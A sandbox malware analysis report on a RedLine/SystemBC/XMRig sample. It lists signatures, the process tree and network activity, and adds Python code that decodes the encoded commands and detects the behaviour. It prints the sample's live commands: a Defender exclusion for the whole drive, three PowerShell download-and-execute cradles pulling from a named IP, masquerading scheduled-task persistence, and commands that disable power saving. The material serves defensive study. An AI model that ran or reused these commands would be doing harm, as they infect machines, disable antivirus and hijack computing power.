Malware Analysis Report

2025-04-03 09:38

Sample ID 230507-bna96sab2x
Target 3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d
SHA256 3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d
Tags
redline systembc xmrig infostealer miner persistence stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d

Threat Level: Known bad

The file 3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d was found to be: Known bad.

Malicious Activity Summary

redline systembc xmrig infostealer miner persistence stealer trojan

Suspicious use of NtCreateUserProcessOtherParentProcess

xmrig

RedLine

SystemBC

Detects Redline Stealer samples

XMRig Miner payload

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-07 01:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-07 01:16

Reported

2023-05-07 05:49

Platform

win7-20230220-en

Max time kernel

112s

Max time network

157s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detects Redline Stealer samples

stealer
Description Indicator Process Target
N/A N/A N/A N/A (5 matches; the sandbox recorded no description, indicator, process or target for any of them)

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (11 matches; the sandbox recorded no description, indicator, process or target for any of them)

Downloads MZ/PE file

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (2 identical events)

Note: the literal %ProgramData% in the path shows an unexpanded environment variable that the sandbox resolved relative to powershell.exe's working directory (System32). The file touched is PowerShell's own Start Menu shortcut, a side effect of launching powershell.exe rather than a payload written to System32; the Files section below records no dropped file under System32, so treat this hit as low signal.

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A (6 events)

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2004 set thread context of 1192 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 2004 set thread context of 2040 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe

Note: the writer is the copy of OneDrive.exe started by the scheduled task (PID 2004, launched by taskeng.exe PID 1000 in the WriteProcessMemory table below). Both targets are conhost.exe instances, the only processes in this run that later request SeLockMemoryPrivilege, the privilege XMRig uses to enable large pages. Taken together with the XMRig payload detection, this is consistent with the miner running inside hollowed conhost.exe processes rather than under its own name.

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (11 events)
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A (6 events)
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A (8 events)

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (6 events)
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A (8 events)
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A (2 events)
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\lsass\lsass.exe N/A

Note: SeLockMemoryPrivilege is what XMRig requests to back its scratchpad with large pages; the two conhost.exe instances asking for it are the targets of the SetThreadContext rows above.

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A (62 identical events)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A (62 identical events)

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 748 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (3 events)
PID 748 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (3 events)
PID 748 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (3 events)
PID 748 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (3 events)
PID 1636 wrote to memory of 1720 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe (3 events)
PID 1108 wrote to memory of 860 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe (3 events)
PID 1108 wrote to memory of 1804 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe (3 events)
PID 1108 wrote to memory of 1696 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe (3 events)
PID 1108 wrote to memory of 948 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe (3 events)
PID 1340 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe (3 events)
PID 1636 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe (4 events)
PID 1000 wrote to memory of 2004 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe (3 events)
PID 1636 wrote to memory of 1444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe (4 events)
PID 1052 wrote to memory of 1472 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe (3 events)
PID 1052 wrote to memory of 1680 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe (3 events)
PID 1052 wrote to memory of 1240 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe (3 events)
PID 1052 wrote to memory of 1736 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe (3 events)
PID 1476 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe (3 events)
PID 2004 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 2004 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 1444 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe (4 events)
PID 1444 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe (2 events)

Note: the sandbox logs the writes a parent makes into a child it is starting as WriteProcessMemory, so most rows here are ordinary process creation and the table doubles as the process tree: the sample (PID 748) starts four powershell.exe instances; 1636 drops and launches OneDrive.exe, dllhost.exe and lsass.exe; 1340 and 1476 are the powershell.exe instances running the task-registration script and they spawn schtasks.exe; taskeng.exe (1000) starts the scheduled-task copy OneDrive\OneDrive.exe (2004); lsass.exe (1444) registers its own task and starts the ProgramData copy (1112). The one pair that is also paired with SetThreadContext, and therefore looks like injection rather than start-up, is OneDrive\OneDrive.exe (2004) writing into the two conhost.exe processes (1192, 2040).

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe

"C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA
(base64 over UTF-16LE; decodes to: Add-MpPreference -ExclusionPath C:\ , a Windows Defender exclusion covering the whole system drive)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
(decodes to: $f5='bClient).Downlo'; $f1='(New-Object Net.We'; $f3='adString(''http://62.204.41.23/file.png'')';$GOO=I`E`X ($f1,$f5,$f3 -Join '')|I`E`X ; the three fragments join to (New-Object Net.WebClient).DownloadString('http://62.204.41.23/file.png') and the downloaded text is piped into Invoke-Expression, the backticks in I`E`X being no-op escapes)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
(decodes to the same split-string cradle with http://62.204.41.23/o.png as the URL: (New-Object Net.WebClient).DownloadString('http://62.204.41.23/o.png') piped into Invoke-Expression)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
(decodes to the same split-string cradle with http://62.204.41.23/r.png as the URL: (New-Object Net.WebClient).DownloadString('http://62.204.41.23/r.png') piped into Invoke-Expression)

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Windows\system32\taskeng.exe

taskeng.exe {C34B5D7C-A13F-4347-A951-70B6E3C0CB74} S-1-5-21-1563773381-2037468142-1146002597-1000:YBHADZIG\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp85B.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7
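The four -enc arguments in the process list above are base64 over UTF-16LE (the encoding PowerShell's -EncodedCommand expects), and three of them split the download cradle into out-of-order string fragments that are joined at run time. The Python below is an added example, not part of the sandbox report: it decodes each argument, rebuilds the string the ($f1,$f5,$f3 -Join '') expression produces, and pulls out the URL. The encoded strings are copied verbatim from the report; the parser deliberately handles only the $var='...' / -Join '' pattern this sample uses and raises on anything else rather than guessing. The first payload decodes to a Defender exclusion for C:\, the other three to (New-Object Net.WebClient).DownloadString('http://62.204.41.23/<file|o|r>.png') whose output is piped into Invoke-Expression (I`E`X, with the backticks acting as no-op escapes).

```python
import base64
import re

# The four -enc arguments from this report's process list, copied verbatim.
ENC_DEFENDER_EXCLUSION = "IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA"
ENC_DOWNLOADERS = [
    "JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==",
    "JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==",
    "JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==",
]

# $name='literal' assignments; '' inside a single-quoted PowerShell string is an escaped quote.
_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'")
# The ($a,$b,$c -Join '') expression that glues the fragments back together.
_JOIN = re.compile(r"\(((?:\$\w+\s*,\s*)+\$\w+)\s+-Join\s+''\)", re.IGNORECASE)
_URL = re.compile(r"https?://[^\s'\"()]+")


def decode_enc(blob: str) -> str:
    """powershell -enc/-EncodedCommand carries base64 of UTF-16LE text, not UTF-8."""
    return base64.b64decode(blob).decode("utf-16-le")


def reassemble_join(script: str) -> str:
    """Rebuild the string produced by (-Join '') from the $var='...' assignments.

    Only the single-quoted-literal form used by this sample is supported; anything
    else raises so the analyst is never handed a silently wrong reconstruction.
    """
    values = {name: raw.replace("''", "'") for name, raw in _ASSIGN.findall(script)}
    m = _JOIN.search(script)
    if not m:
        raise ValueError("no (-Join '') pattern found")
    order = re.findall(r"\$(\w+)", m.group(1))          # variables in join order
    return "".join(values[name] for name in order)


def analyze(blob: str) -> dict:
    """Decode one -enc payload and classify what it does."""
    decoded = decode_enc(blob)
    result = {"decoded": decoded, "kind": "unknown", "url": None}
    if re.search(r"Add-MpPreference\s+-Exclusion", decoded, re.IGNORECASE):
        result["kind"] = "defender-exclusion"
    elif _JOIN.search(decoded):
        expr = reassemble_join(decoded)
        result["expression"] = expr
        url = _URL.search(expr)
        result["url"] = url.group(0) if url else None
        # I`E`X is IEX (Invoke-Expression): a backtick before a letter in a bare word
        # is an escape with no effect, so the cradle is IEX(<download>) | IEX.
        if "DownloadString" in expr and re.search(r"I`?E`?X", decoded):
            result["kind"] = "download-and-execute"
    return result


def analyze_all() -> list:
    """Decode the Defender exclusion first, then the three download cradles."""
    return [analyze(ENC_DEFENDER_EXCLUSION)] + [analyze(b) for b in ENC_DOWNLOADERS]


if __name__ == "__main__":
    for r in analyze_all():
        print(r["kind"], r["url"] or r["decoded"].strip())
```

Run stand-alone it prints one line per payload: the exclusion command, then the three URLs on 62.204.41.23, which are the destinations of the three HTTP connections in the Network table.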

Network

Country Destination Domain Proto
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 maper.info udp
DE 148.251.234.93:443 maper.info tcp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 pool.hashvault.pro udp
US 142.202.242.45:80 pool.hashvault.pro tcp

Note: the three plain-HTTP connections to 62.204.41.23 match the three download cradles in the encoded PowerShell command lines (file.png, o.png and r.png on that host). pool.hashvault.pro is a public Monero mining pool, consistent with the XMRig detection; the miner reaches it on port 80, so a block list keyed on the usual stratum ports would miss it. The report does not attribute the maper.info traffic to a specific process.
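The behaviours in the Signatures, Processes and Network sections translate into a small set of detection rules that do not depend on the dropped files' hashes, which rotate freely. The Python below is an added example, not part of the report: it runs those rules over event records constructed to mirror this run (PIDs and command lines are taken from the WriteProcessMemory and Processes sections; the event schema, the watch-lists, and the attribution of the pool connection to the injected conhost.exe PID 1192 are assumptions of the example). Two design points worth noting: OneDrive.exe, lsass.exe and dllhost.exe are legitimate names only in specific directories, so the masquerade rule keys on the path; and both components register a task named OneDrive with /f, so the second /create silently replaces the first, which is why the task rule keys on the task's target path rather than its name. The conhost.exe that hosts the miner passes the path check because it is the genuine System32 binary, which is what the network-side rule is for.

```python
import base64
import re
from collections import namedtuple

# Event schema is this example's own (constructed), not Sysmon's or an EDR's.
ProcessEvent = namedtuple("ProcessEvent", "pid image command_line")
NetworkEvent = namedtuple("NetworkEvent", "pid domain dest")

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Windows binary names this sample borrows; legitimate only under SYSTEM_DIRS.
PROTECTED_NAMES = {"lsass.exe", "dllhost.exe", "conhost.exe", "svchost.exe", "taskeng.exe"}
# OneDrive.exe is legitimate only inside its per-user or machine-wide install directory.
ONEDRIVE_DIRS = ("\\microsoft\\onedrive\\", "\\program files\\microsoft onedrive\\")
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\users\\public\\", "\\temp\\")
# Constructed watch-list; pool.hashvault.pro is the domain in the report's network table.
MINING_POOL_HINTS = ("pool.", "hashvault", "minexmr", "nanopool", "supportxmr")

_TASK_CREATE = re.compile(r"schtasks(?:\.exe)?[\"']?\s+/create|Register-ScheduledTask", re.I)
_TASK_TARGET = re.compile(r"(?:/tr\s+|-Execute\s+)['\"]*([^'\"]+)", re.I)
_ENC = re.compile(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
_POWERCFG = re.compile(r"-(?:standby|hibernate)-timeout-(?:ac|dc)\s+0", re.I)


def check_masquerade(ev):
    # A system binary's name is only trustworthy in the directory it ships in.
    path = ev.image.lower()
    name = path.rsplit("\\", 1)[-1]
    if name in PROTECTED_NAMES and not path.startswith(SYSTEM_DIRS):
        return f"Windows binary name outside System32/SysWOW64: {ev.image}"
    if name == "onedrive.exe" and not any(d in path for d in ONEDRIVE_DIRS):
        return f"OneDrive.exe outside its install directory: {ev.image}"
    return None


def check_scheduled_task(ev):
    # Key on the task's target path, not its name: both components here use /tn OneDrive.
    if not _TASK_CREATE.search(ev.command_line):
        return None
    m = _TASK_TARGET.search(ev.command_line)
    target = m.group(1).strip() if m else ""
    if any(d in target.lower() for d in USER_WRITABLE):
        return f"scheduled task launches binary from user-writable path: {target}"
    return None


def check_defender_exclusion(ev):
    # -EncodedCommand is base64 over UTF-16LE; decode so the rule sees the real verb.
    m = _ENC.search(ev.command_line)
    text = base64.b64decode(m.group(1)).decode("utf-16-le") if m else ev.command_line
    if re.search(r"Add-MpPreference\s+-Exclusion", text, re.I):
        return "Defender exclusion added:" + text.rstrip()
    return None


def check_powercfg(ev):
    if ev.image.lower().endswith("\\powercfg.exe") and _POWERCFG.search(ev.command_line):
        return f"standby/hibernate disabled (keeps the miner running): {ev.command_line}"
    return None


def check_mining_pool(ev):
    if any(h in ev.domain.lower() for h in MINING_POOL_HINTS):
        return f"PID {ev.pid} contacted mining pool {ev.domain} ({ev.dest})"
    return None


PROCESS_RULES = (check_masquerade, check_scheduled_task, check_defender_exclusion, check_powercfg)


def triage(process_events, network_events):
    """Return (pid, rule name, detail) for every rule that fires."""
    findings = []
    for ev in process_events:
        for rule in PROCESS_RULES:
            hit = rule(ev)
            if hit:
                findings.append((ev.pid, rule.__name__, hit))
    for ev in network_events:
        hit = check_mining_pool(ev)
        if hit:
            findings.append((ev.pid, "check_mining_pool", hit))
    return findings


# Constructed events mirroring the report's Processes and WriteProcessMemory sections.
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PROCESS_EVENTS = [
    ProcessEvent(748, SAMPLE, f'"{SAMPLE}"'),
    ProcessEvent(928, PS, '"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA'),
    ProcessEvent(1720, r"C:\Users\Admin\AppData\Roaming\OneDrive.exe", r'"C:\Users\Admin\AppData\Roaming\OneDrive.exe"'),
    ProcessEvent(1068, r"C:\Windows\system32\schtasks.exe",
                 r""""C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'"""),
    ProcessEvent(860, r"C:\Windows\System32\powercfg.exe", "powercfg /x -hibernate-timeout-ac 0"),
    ProcessEvent(1444, r"C:\Users\Admin\AppData\Roaming\lsass.exe", r'"C:\Users\Admin\AppData\Roaming\lsass.exe"'),
    ProcessEvent(1592, r"C:\Windows\SysWOW64\schtasks.exe",
                 r'"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f'),
    ProcessEvent(1192, r"C:\Windows\System32\conhost.exe", r"C:\Windows\System32\conhost.exe"),  # genuine binary, hosts the miner
]
# Attributing the pool connection to PID 1192 is an assumption; the report lists only the destination.
NETWORK_EVENTS = [NetworkEvent(1192, "pool.hashvault.pro", "142.202.242.45:80")]


def run():
    return triage(PROCESS_EVENTS, NETWORK_EVENTS)
```

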